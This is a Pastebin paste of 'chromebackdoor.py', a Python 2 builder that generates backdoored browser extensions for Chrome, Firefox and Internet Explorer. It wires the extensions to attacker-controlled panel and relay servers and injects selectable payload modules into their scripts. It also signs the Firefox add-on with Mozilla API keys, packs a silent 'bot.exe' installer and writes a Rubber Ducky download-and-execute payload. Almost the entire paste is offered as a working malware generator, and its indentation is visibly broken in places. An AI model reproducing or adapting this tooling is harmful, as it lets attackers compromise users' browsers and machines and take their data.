API tools faq
paste
Advertisement
FlyFar

chromebackdoor.py

FlyFar
Sep 6th, 2023
952
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 25.07 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. #!usr/bin/env python3
  2.  
  3. import os,sys
  4. import shutil
  5. import subprocess
  6. import random
  7. import glob
  8. import time
  9. import errno
  10. from crxmake import package
  11.  
  12. class bcolors:
  13.     HEADER = '\033[95m'
  14.     OKBLUE = '\033[94m'
  15.     OKGREEN = '\033[92m'
  16.     WARNING = '\033[93m'
  17.     FAIL = '\033[91m'
  18.     ENDC = '\033[0m'
  19.     BOLD = '\033[1m'
  20.     UNDERLINE = '\033[4m'
  21.  
  22. def ducky_payload():
  23.     print bcolors.OKBLUE + "[+] Generate Rubber Ducky payload..." + bcolors.ENDC
  24.     if os.path.exists("backdoor/rubber_ducky/payload.chromebackdoor"):
  25.     open_file = open("backdoor/rubber_ducky/payload.chromebackdoor").read()
  26.     if not os.path.exists("payload.txt"):
  27.         open_payload = open("payload.txt", "a+")
  28.         user_input = raw_input("Domain directory (http://localhost.com/dir/)$ ")
  29.         if user_input == "":
  30.         domain = "http://localhost/dir/"
  31.         else:
  32.         if not user_input.endswith('/'):
  33.             user_input = user_input + "/"
  34.         domain = user_input
  35.         user_input = raw_input("Executable name (bot.exe)$ ")
  36.         if user_input == "":
  37.         executable = "bot.exe"
  38.         else:
  39.         executable = user_input
  40.         content = open_file.replace("%server%", domain)
  41.         content = content.replace("%exe%", executable)
  42.         open_payload.write(content)
  43.         open_payload.close()
  44.         print bcolors.OKGREEN + "[+] Payload created : " + os.getcwd() + "/payload.txt" + bcolors.ENDC
  45.     else:
  46.         print bcolors.FAIL + "[!] Payload already here please delete " +os.getcwd() + "/payload.txt" + bcolors.ENDC
  47.     else:
  48.     print bcolors.FAIL + "[-] Payload maker not found" + bcolors.ENDC
  49.  
  50. def logon():
  51.     print """
  52.       ____ _                              ____             _       _                  
  53.      / ___| |__  _ __ ___  _ __ ___   ___| __ )  __ _  ___| | ____| | ___   ___  _ __
  54.     | |   | '_ \| '__/ _ \| '_ ` _ \ / _ \ _ \ / _` |/ __| |/ / _` |/ _ \ / _ \| '__|
  55.     | |___| | | | | | (_) | | | | | |  __/ |_) | (_| | (__|   < (_| | (_) | (_) | |  
  56.      \____|_| |_|_|  \___/|_| |_| |_|\___|____/ \__,_|\___|_|\_\__,_|\___/ \___/|_|  
  57.                          
  58.      VERSION 3.0 - graniet75@gmail.com - @graniet75
  59.    """
  60.  
  61. def show_plugins(backdoor = ''):
  62.     print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] Listing payloads..."
  63.     listing = glob.glob('backdoor/plugins/*.chromebackdoor')
  64.     current = 1
  65.     for line in listing:
  66.     if line != "":
  67.         line = open(line).read()
  68.         title = line.split('%title%')[1]
  69.         print "["+bcolors.WARNING+"/"+bcolors.ENDC+"] "+str(current)+" -> " + title.split('%title%')[0]
  70.         current+=1
  71.     user_input = raw_input("[?] please select numbers ? ")
  72.     if listing[int(user_input) - 1] != "":
  73.     module_content = open(listing[int(user_input) - 1]).read().split("%content%")[1].split("%content%")[0]
  74.     print "["+bcolors.OKBLUE+"*"+bcolors.ENDC+"]" + listing[int(user_input) - 1]
  75.     oned = ""
  76.     if oned == "":
  77.         action = 0
  78.         while action == 0:
  79.         if backdoor == "":
  80.             user_input = raw_input('[?] backdoor folder ? ')
  81.             else:
  82.             user_input = backdoor
  83.         if user_input != '':
  84.            if(os.path.isdir(user_input)):
  85.             if not user_input.endswith('/'):
  86.                 user_input = user_input + "/"
  87.             print "["+bcolors.OKBLUE+"*"+bcolors.ENDC+"] " + user_input
  88.             action = 1
  89.             if(os.path.isfile(user_input + 'iexplorer/script.js')):
  90.                 selected = "iexplorer"
  91.                 open_file = open(user_input + 'iexplorer/script.js').read()
  92.                 content  = open_file.replace("//module",module_content +"\n//module")
  93.                 content = content.replace("%content%", "")
  94.                 new_file = open(user_input +'iexplorer/script.js',"w")
  95.                 new_file.write(content+"\n")
  96.                 print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] backdoor iexplorer writed !"
  97.             elif(os.path.isfile(user_input + 'firefox/data/content.js')):
  98.                 selected = "firefox"
  99.                 open_file = open(user_input + 'firefox/data/content.js').read()
  100.                 content  = open_file.replace("//module",module_content +"\n//module")
  101.                 content = content.replace("%content%", "")
  102.                 new_file = open(user_input +'firefox/data/content.js',"w")
  103.                 new_file.write(content+"\n")
  104.                 print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] backdoor firefox writed !"
  105.             elif(os.path.isfile(user_input + 'server/js/check.js')):
  106.                 selected = "chrome"
  107.                 open_file = open(user_input + 'server/js/check.js').read()
  108.                 content  = open_file.replace("//module",module_content +"\n//module")
  109.                 content = content.replace("%content%", "")
  110.                 new_file = open(user_input +'server/js/check.js',"w")
  111.                 new_file.write(content+"\n")
  112.                 print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] backdoor chrome writed !"
  113.  
  114. def logo():
  115.     print """
  116.      _                                                    
  117.  ___| |__  _ __ ___  _ __ ___   ___                      
  118. / __| '_ \| '__/ _ \| '_ ` _ \ / _ \                    
  119. | (__| | | | | | (_) | | | | | |  __/                      
  120. \___|_| |_|_| _\___/|_| |_| |_|____|   _                  
  121.              | |__   __ _  ___| | ____| | ___   ___  _ __
  122.              | '_ \ / _` |/ __| |/ / _` |/ _ \ / _ \| '__|
  123.              | |_) | (_| | (__|   < (_| | (_) | (_) | |  
  124.              |_.__/ \__,_|\___|_|\_\__,_|\___/ \___/|_|  
  125.                                                          
  126.            (c) Graniet - graniet75@gmail.com - @graniet75                                                
  127. """
  128.  
  129. def copy(src, dest):
  130.     try:
  131.         shutil.copytree(src, dest)
  132.     except OSError as e:
  133.         if e.errno == errno.ENOTDIR:
  134.             shutil.copy(src, dest)
  135.         else:
  136.             print('Directory not copied. Error: %s' % e)
  137.  
  138. def iexplorer():
  139.     backdoor_information = {}
  140.     backdoor_information['gate'] = "index.php"
  141.     backdoor_information['output_dir'] = "backdoor/backdoor"
  142.     backdoor_information['output_name'] = "/iexplorer"
  143.     action = 0
  144.     print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] IExplorer backdoor..."
  145.     print "/"+bcolors.WARNING+"!"+bcolors.ENDC+"\\ please use HTTPS hosting for relais information."
  146.     while action == 0:
  147.         site = raw_input("[?] Website host (https://localhost/) ? ")
  148.         if site == "":
  149.        site = "https://localhost/"
  150.        action = 1
  151.         elif site.endswith('/'):
  152.        action = 1
  153.         else:
  154.        site = site+"/"
  155.        action = 1
  156.     backdoor_information['site'] = site
  157.     action = 0
  158.     while action == 0:
  159.     relais = raw_input("[?] Relais host (https://localhost/relais) ? ")
  160.     if relais == "":
  161.         relais =  "https://localhost/relais"
  162.         action = 1
  163.     elif relais.endswith('/'):
  164.         relais = relais[:-1]
  165.         action = 1
  166.     else:
  167.         action = 1
  168.     backdoor_information['relais'] = relais
  169.     action = 0
  170.     if(os.path.isfile('backdoor/iexplorer/script.js')):
  171.         copy('backdoor/iexplorer/','backdoor/iexplorer_bk/')
  172.         file_read = open('backdoor/iexplorer/script.js').read()
  173.         if "//settings" in file_read:
  174.         relais = backdoor_information['relais']
  175.             code = file_read.replace("//settings", "\n\n    var server_web = '"+site+"'\n    var lock_page = '"+relais+"/lock.php' \n    var gate_page = '"+relais+"/index.php'\n")
  176.             file_write = open('backdoor/iexplorer_bk/script.js', 'w')
  177.             file_write.write(code)
  178.             file_write.close()
  179.         copy('backdoor/iexplorer_bk/','backdoor/backdoor/iexplorer')
  180.             copy('backdoor/web/','backdoor/web_bk/')
  181.             file_read = open('backdoor/web/show.php').read()
  182.             if "//settings" in file_read:
  183.         panel = backdoor_information['site']
  184.                 code = file_read.replace('//settings', "var server_web = '"+panel+"'\n var gate_page = 'web/show.php'")
  185.                 file_write = open('backdoor/web_bk/show.php', 'w')
  186.                 file_write.write(code)
  187.                 file_write.close()
  188.                 #install_relais(panel)
  189.         copy('backdoor/web_bk/','backdoor/backdoor/web/')
  190.     print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] Configure relais information..."
  191.     copy('backdoor/relais/', 'backdoor/relais_bk/')
  192.     file_read = open('backdoor/relais/index.php').read()
  193.     if "//domain" in file_read:
  194.         domain = backdoor_information['site']
  195.         code = file_read.replace('//domain', '$domain = "'+domain+'";\n')
  196.         file_write = open('backdoor/relais_bk/index.php','w')
  197.         file_write.write(code)
  198.         file_write.close()
  199.     file_script = open('backdoor/relais/show_script.php').read()
  200.     if "//domain" in file_script:
  201.         code = file_script.replace('//domain', '$domain = "'+domain+'";\n')
  202.         file_write = open('backdoor/relais_bk/show_script.php', 'w')
  203.         file_write.write(code)
  204.         file_write.close()
  205.     copy('backdoor/relais_bk/','backdoor/backdoor/relais/')
  206.     print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] Successfully configure."
  207.     show_plugins('backdoor/backdoor/')
  208.     name_archive = str(random.randint(1,99999))
  209.     shutil.make_archive(name_archive,'zip', 'backdoor/backdoor/')
  210.     shutil.rmtree('backdoor/iexplorer_bk')
  211.     shutil.rmtree('backdoor/web_bk/')
  212.     shutil.rmtree('backdoor/relais_bk/')
  213.     shutil.rmtree('backdoor/backdoor')
  214.     print bcolors.OKGREEN+"Generation successful :"+os.getcwd()+"/"+name_archive+".zip"+bcolors.ENDC
  215.     else:
  216.         print "not here"
  217.  
  218. def verify_xpi(information_array):
  219.     output_name = information_array['output_name']
  220.     FNULL = open(os.devnull, 'w')
  221.     print "["+bcolors.OKGREEN +"+"+ bcolors.ENDC+"] checking USER-KEY..."
  222.     config_file = open('config.conf').read()
  223.     user_id = config_file.split('MOZ_API_KEY=')[1].split('#')[0]
  224.     if user_id != '':
  225.         print "["+bcolors.OKGREEN +"+"+ bcolors.ENDC+"] checking PRIV-KEY..."
  226.         priv_key = config_file.split('MOZ_PRIV_KEY=')[1].split('#')[0]
  227.         if priv_key != '':
  228.             xpi_file = glob.glob(information_array['output_dir']+output_name+'/*.xpi')
  229.             xpi_file =  xpi_file[0]
  230.             action = 0
  231.             while action == 0:
  232.             user_input = raw_input('[?] Directory for XPI load ('+os.getcwd()+') ? ')
  233.             if user_input == '':
  234.                 user_input = os.getcwd()
  235.                 action = 1
  236.             else:
  237.                 if os.path.isdir(user_input):
  238.                     action = 1
  239.             print "["+bcolors.OKGREEN +"+"+ bcolors.ENDC+"] please wait..."
  240.             try:
  241.                 subprocess.call(["jpm", "-v", "sign", "--api-key="+user_id, "--api-secret="+priv_key, "--xpi="+xpi_file],stdout=FNULL, stderr=subprocess.STDOUT)
  242.                 print "["+bcolors.OKGREEN +"+"+ bcolors.ENDC+"] success sign xpi."
  243.                 time.sleep(100)
  244.             except:
  245.                 print "["+bcolors.FAIL+"-"+bcolors.ENDC+"] Error on sign XPI"
  246.         else:
  247.             print "["+bcolors.FAIL +"-"+ bcolors.ENDC+"] Please configure account on config.ini"
  248.     else:
  249.         print "["+bcolors.FAIL +"-"+ bcolors.ENDC+"] Please configure account on config.ini"
  250.  
  251.  
  252. def generate_xpi(information_array):
  253.     output_name = information_array['output_name']
  254.     FNULL = open(os.devnull, 'w')
  255.     print "["+bcolors.OKGREEN +"+"+ bcolors.ENDC+"] checking JPM..."
  256.     try:
  257.         subprocess.call(["jpm"],stdout=FNULL, stderr=subprocess.STDOUT)
  258.         print "["+bcolors.OKGREEN +"+"+ bcolors.ENDC+"] generate XPI file..."
  259.         subprocess.call(["jpm", "xpi",'--addon-dir='+information_array["output_dir"]+output_name+''],stdout=FNULL, stderr=subprocess.STDOUT)
  260.         print "["+bcolors.OKGREEN +"+"+ bcolors.ENDC+"] XPI OK."
  261.     except:
  262.             print "["+bcolors.FAIL +"-"+ bcolors.ENDC+"] Error on JPM please install it."
  263.     user_input = raw_input("[?] sign XPI ? [Y/n]")
  264.     if user_input == '' or user_input == 'y' or user_input == 'Y':
  265.         verify_xpi(information_array)
  266.  
  267. def compile_payload(type):
  268.     if type == "--chrome":
  269.     payload_del = "installer/ch/test.crx"
  270.     old_folder = "installer/ch/"
  271.     new_folder = "installer/ch_bk/"
  272.     elif type == "--ie":
  273.     payload_del = "installer/ie/script.js"
  274.     old_folder = "installer/ie"
  275.     new_folder = "installer/ie_bk"
  276.     try:
  277.     print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] Starting installer..."
  278.     subprocess.call(["wine", "start", 'installer/build.cmd'])
  279.     walls = 0
  280.     print "/"+bcolors.WARNING+"!"+bcolors.ENDC+"\\ If popup open please close with <"+bcolors.FAIL+"return"+bcolors.ENDC+"> input."
  281.     print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] Waiting bot.exe"
  282.     time.sleep(20)
  283.     while walls == 0:
  284.         if os.path.isfile('installer/setup.exe'):
  285.         copy('installer/setup.exe', 'bot.exe')
  286.         os.remove('installer/setup.exe')
  287.         os.remove(payload_del)
  288.         copy(old_folder,new_folder)
  289.         shutil.rmtree(old_folder)
  290.         walls = 1
  291.         print bcolors.OKGREEN+"Generate successful : "+os.getcwd()+"/bot.exe"+bcolors.ENDC
  292.         user_input = raw_input("Generate Rubber Ducky payload [y/N]? $ ")
  293.         if user_input == "Y" or user_input == "y":
  294.             ducky_payload()
  295.     except:
  296.     print "["+bcolors.WARNING+"-"+bcolors.ENDC+"] Please install wine32"
  297.  
  298. def executable_silent():
  299.     user_input = raw_input("["+bcolors.OKBLUE+"?"+bcolors.ENDC+"] backdoor type(--chrome,--ie) ? $ ")
  300.     if user_input == "" or user_input == "--chrome":
  301.     action = 0
  302.     while action == 0:
  303.         user_input = raw_input("["+bcolors.OKBLUE+"?"+bcolors.ENDC+"] crx file ("+os.getcwd()+"/mycrx.crx) ? ")
  304.         if user_input != "" and os.path.isfile(user_input):
  305.         action = 1
  306.         copy(user_input,'installer/ch_bk/test.crx')
  307.         os.rename('installer/ch_bk/','installer/ch/')
  308.         #backdoor_name = glob.glob('installer/ch/*.crx')[0]
  309.         #print backdoor_name
  310.         compile_payload('--chrome')
  311.     elif user_input == "--ie":
  312.     action = 0
  313.     while action == 0:
  314.         user_input = raw_input("["+bcolors.OKBLUE+"?"+bcolors.ENDC+"] script file for ie payload (script.js) ? ")
  315.         if user_input != "":
  316.         if os.path.isfile(user_input):
  317.             action = 1
  318.             copy(user_input,"installer/ie_bk/script.js")
  319.             os.rename('installer/ie_bk/', 'installer/ie/')
  320.             compile_payload('--ie')
  321.  
  322. def install_firefox_server():
  323.     backdoor_information = {}
  324.     backdoor_information['gate'] = "index.php"
  325.     backdoor_information['output_dir'] = "backdoor/backdoor"
  326.     backdoor_information['output_name'] = "/firefox"
  327.     action = 0
  328.     print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] Firefox backdoor..."
  329.     print "/"+bcolors.WARNING+"!"+bcolors.ENDC+"\\ please use HTTPS hosting for relais information."
  330.     while action == 0:
  331.         site = raw_input("[?] Website host (https://localhost/) ? ")
  332.         if site == "":
  333.         site = "https://localhost/"
  334.         action = 1
  335.         elif site.endswith('/'):
  336.         action = 1
  337.         else:
  338.         site = site+"/"
  339.         action = 1
  340.     backdoor_information['site'] = site
  341.     action = 0
  342.     while action == 0:
  343.         relais = raw_input("[?] Relais host (https://localhost/relais) ? ")
  344.         if relais == "":
  345.         relais =  "https://localhost/relais"
  346.         action = 1
  347.         elif relais.endswith('/'):
  348.         relais = relais[:-1]
  349.         action = 1
  350.         else:
  351.         action = 1
  352.     backdoor_information['relais'] = relais
  353.     action = 0
  354.     print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] Generate Backdoor aspect."
  355.     while action == 0:
  356.         user_input = raw_input("[?] Name of extension ? ")
  357.         if user_input != '':
  358.         backdoor_information['name'] = user_input
  359.         action = 1
  360.     action = 0
  361.     while action == 0:
  362.         user_input = raw_input("[?] Description of extension ? ")
  363.         if user_input != "":
  364.         backdoor_information['description'] = user_input
  365.         action = 1
  366.     action = 0
  367.     while action == 0:
  368.         user_input = raw_input("[?] Version of extension ? ")
  369.         if user_input != "":
  370.         backdoor_information['version'] = user_input
  371.         action = 1
  372.     action = 0
  373.     while action == 0:
  374.         user_input = raw_input("[?] Icon of extension ("+os.getcwd()+"/backdoor/img/default.png) ? ")
  375.         if user_input == '':
  376.         backdoor_information['icon'] = user_input
  377.         action = 1
  378.         else:
  379.         if os.path.isfile("/backdoor/img/" + user_input):
  380.             backdoor_information['icon'] = user_input
  381.             action = 1
  382.         elif os.path.isfile(user_input):
  383.             backdoor_information['icon'] = user_input
  384.             action = 1
  385.     action = 0
  386.     copy("backdoor/firefox/","backdoor/firefox_bk/")
  387.     open_manifest = open('backdoor/firefox/package.json')
  388.     erase_bk = open('backdoor/firefox_bk/package.json', 'w').close()
  389.     open_bk = open('backdoor/firefox_bk/package.json','a+')
  390.     for line in open_manifest:
  391.         if "//NAME_NB//" in line:
  392.         line = line.replace("//NAME_NB//", str(random.randint(100,9999)))
  393.         if "//NAME//" in line:
  394.         print "ok"
  395.         line = line.replace("//NAME//", backdoor_information['name'])
  396.         if "//DESCRIPTION//" in line:
  397.         line = line.replace("//DESCRIPTION//", backdoor_information['description'])
  398.         if "//VERSION//" in line:
  399.         line = line.replace("//VERSION//", backdoor_information['version'])
  400.         open_bk.write(line)
  401.     open_bk.close()
  402.     print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] generate environement var..."
  403.     open_server = open('backdoor/firefox/data/content.js')
  404.     erase_server = open('backdoor/firefox_bk/data/content.js','w').close()
  405.     new_server = open('backdoor/firefox_bk/data/content.js', 'a+')
  406.     for line in open_server:
  407.         if "//ENVVAR//" in line:
  408.         server = backdoor_information['relais']
  409.         gate = backdoor_information['gate']
  410.         env = "var server_web='"+server+"';\n var gate_page='"+gate+"';"
  411.         line = line.replace("//ENVVAR//", env)
  412.         new_server.write(line)
  413.     new_server.close()
  414.     os.makedirs('backdoor/backdoor/')
  415.     copy('backdoor/firefox_bk/','backdoor/backdoor/firefox/')
  416.     generate_xpi(backdoor_information)
  417.     copy('backdoor/web/','backdoor/web_bk/')
  418.     file_read = open('backdoor/web/show.php').read()
  419.     if "//settings" in file_read:
  420.         panel = backdoor_information['site']
  421.         code = file_read.replace('//settings', "var server_web = '"+panel+"'\n var gate_page = 'show.php'")
  422.         file_write = open('backdoor/web_bk/show.php', 'w')
  423.         file_write.write(code)
  424.         file_write.close()
  425.     copy('backdoor/web_bk/','backdoor/backdoor/web/')
  426.     print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] Configure relais information..."
  427.     copy('backdoor/relais/', 'backdoor/relais_bk/')
  428.     file_read = open('backdoor/relais/index.php').read()
  429.     if "//domain" in file_read:
  430.         domain = backdoor_information['site']
  431.         code = file_read.replace('//domain', '$domain = "'+domain+'";\n')
  432.         file_write = open('backdoor/relais_bk/index.php','w')
  433.         file_write.write(code)
  434.         file_write.close()
  435.     file_script = open('backdoor/relais/show_script.php').read()
  436.     if "//domain" in file_script:
  437.         code = file_script.replace('//domain', '$domain = "'+domain+'";\n')
  438.         file_write = open('backdoor/relais_bk/show_script.php', 'w')
  439.         file_write.write(code)
  440.         file_write.close()
  441.     copy('backdoor/relais_bk/','backdoor/backdoor/relais/')
  442.     print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] Successfully configure."
  443.     show_plugins('backdoor/backdoor/')
  444.     name_archive = str(random.randint(1,99999))
  445.     shutil.make_archive(name_archive,'zip', 'backdoor/backdoor/')
  446.     shutil.rmtree('backdoor/firefox_bk')
  447.     shutil.rmtree('backdoor/web_bk/')
  448.     shutil.rmtree('backdoor/relais_bk/')
  449.     shutil.rmtree('backdoor/backdoor')
  450.     print bcolors.OKGREEN+"Generation successful :"+os.getcwd()+"/"+name_archive+".zip"+bcolors.ENDC
  451.  
  452. def install_relais(domain):
  453.     install_status = 0
  454.     try:
  455.         while install_status != 1:
  456.             if domain.endswith('/'):
  457.         print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] Configure relais information..."
  458.                 copy('backdoor/relais/', 'backdoor/relais_bk/')
  459.                 file_read = open('backdoor/relais/index.php').read()
  460.                 if "//domain" in file_read:
  461.                     code = file_read.replace('//domain', '$domain = "'+domain+'";\n')
  462.                     file_write = open('backdoor/relais/index.php', 'w')
  463.                     file_write.write(code)
  464.                     file_write.close()
  465.                     file_script = open('backdoor/relais/show_script.php').read()
  466.                     if "//domain" in file_script:
  467.                         code = file_script.replace('//domain', ' $domain = "'+domain+'";\n')
  468.                         file_write = open('backdoor/relais/show_script.php', 'w')
  469.                         file_write.write(code)
  470.                         file_write.close()
  471.                     print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] Successfully configure."
  472.                     output_filename = str(random.randint(1000,99999))
  473.                     if(os.path.isdir('backdoor/backdoor/')):
  474.                         shutil.rmtree('backdoor/backdoor/')
  475.                     os.makedirs('backdoor/backdoor/')
  476.                     copy('backdoor/web','backdoor/backdoor/web/')
  477.                     copy('backdoor/relais', 'backdoor/backdoor/relais/')
  478.                     copy('backdoor/server', 'backdoor/backdoor/server/')
  479.             show_plugins('backdoor/backdoor/')
  480.             package('backdoor/backdoor/server/', outfile='backdoor/backdoor/backdoor')
  481.             print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] Write crx..."
  482.             print "|   backdoor.crx writed."
  483.             print "|   backdoor.pem writed."
  484.                     shutil.make_archive(output_filename, 'zip', 'backdoor/backdoor/')
  485.                     shutil.rmtree('backdoor/backdoor/')
  486.                     shutil.rmtree('backdoor/web/')
  487.                     shutil.rmtree('backdoor/relais/')
  488.                     shutil.rmtree('backdoor/server/')
  489.                     shutil.move('backdoor/web_bk/', 'backdoor/web/')
  490.                     shutil.move('backdoor/relais_bk/', 'backdoor/relais/')
  491.                     shutil.move('backdoor/server_bk/', 'backdoor/server/')
  492.                     print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] New backdoor here : " + os.getcwd() + '/' +output_filename+'.zip'
  493.                 print "|   Good hacking!\n"
  494.                     install_status = 1
  495.             else:
  496.                 print "Please use correct url ex: http://site.com/chromebackdoor/"
  497.         domain = raw_input('['+bcolors.OKBLUE+'?'+bcolors.ENDC+'] Website hosted (https://localhost/)? ')
  498.             if domain == '':
  499.             domain = "https://localhost/"
  500.     except OSError as e:
  501.     print('Directory not copied. Error: %s' % e)
  502.  
  503. def install_server_chrome():
  504.     try:
  505.         get_url = 1
  506.         while(get_url != 2):
  507.         print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] chrome backdoor..."
  508.             print "/"+bcolors.WARNING+"!"+bcolors.ENDC+"\\ please use HTTPS hosting for relais information."
  509.             panel = raw_input('['+bcolors.OKBLUE+'?'+bcolors.ENDC+'] Website hosted (https://localhost/)? ')
  510.             if panel == '':
  511.         panel = "https://localhost/"
  512.         print "|   " + panel
  513.             relais = raw_input('['+bcolors.OKBLUE+'?'+bcolors.ENDC+'] Website relais url (https://localhost/relais)? ')
  514.         if relais == "":
  515.         relais = "https://localhost/relais"
  516.        
  517.             relais_end = panel + relais
  518.             relais_lock = relais_end +  "/lock.php"
  519.             relais_gate = relais_end + "/index.php"
  520.             print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] Web    : " + panel
  521.         print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] Relais : " + relais
  522.         input_user = raw_input("["+bcolors.OKBLUE+"?"+bcolors.ENDC+"] Information correct [Y/n]? ")
  523.         if input_user == '' or input_user == 'y' or input_user == 'Y':
  524.             get_url = 2
  525.         if(os.path.isfile('backdoor/server/js/check.js')):
  526.             copy('backdoor/server/','backdoor/server_bk/')
  527.             file_read = open('backdoor/server/js/check.js').read()
  528.             if "//settings" in file_read:
  529.                 code = file_read.replace("//settings", "\n\n    var server_web = '"+panel+"'\n    var lock_page = '"+relais+"/lock.php' \n    var gate_page = '"+relais+"/index.php'\n")
  530.                 file_write = open('backdoor/server/js/check.js', 'w')
  531.                 file_write.write(code)
  532.                 file_write.close()
  533.                 copy('backdoor/web/','backdoor/web_bk/')
  534.                 file_read = open('backdoor/web/show.php').read()
  535.                 if "//settings" in file_read:
  536.                     code = file_read.replace('//settings', "var server_web = '"+panel+"'\n var gate_page = 'web/show.php'")
  537.                     file_write = open('backdoor/web/show.php', 'w')
  538.                     file_write.write(code)
  539.                     file_write.close()
  540.                     install_relais(panel)
  541.             else:
  542.                 print "not here"
  543.        
  544.     except OSError as e:
  545.     print('Directory not copied. Error: %s' % e)
  546.  
  547. def help():
  548.     print "["+bcolors.OKBLUE+"!"+bcolors.ENDC+"] Welcome to Chromebackdoor."
  549.     print "--------------------------------------------"
  550.     print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] --firefox : generate firefox XPI backdoor"
  551.     print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] --chrome  : generate GoogleChrome backdoor"
  552.     print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] --ie      : generate IE backdoor"
  553.     print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] --build   : generate silent executable"
  554.     print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] --payload : show available payloads"
  555.     print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] --binder  : compact extension to extension"
  556.     print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] --rubber  : create Rubber Ducky download & execute"
  557.     print "--------------------------------------------"
  558.     print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] exemple:"
  559.     print "|   usage : python " + sys.argv[0] + " [CMD]"
  560.     print "\n"
  561. def main():
  562.     if(len(sys.argv) > 1):
  563.         if(sys.argv[1] == "--chrome"):
  564.             install_server_chrome()
  565.     elif(sys.argv[1] == "--firefox"):
  566.         install_firefox_server()
  567.     elif(sys.argv[1] == "--build"):
  568.         executable_silent()
  569.     elif(sys.argv[1] == "--ie"):
  570.         iexplorer()
  571.     elif(sys.argv[1] == "--payload"):
  572.         show_plugins()
  573.     elif(sys.argv[1] == "--rubber"):
  574.         ducky_payload()
  575.     else:
  576.         help()
  577.     else:
  578.     help()
  579. logo()
  580. main()
Tags: chrome Backdoor PoC
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!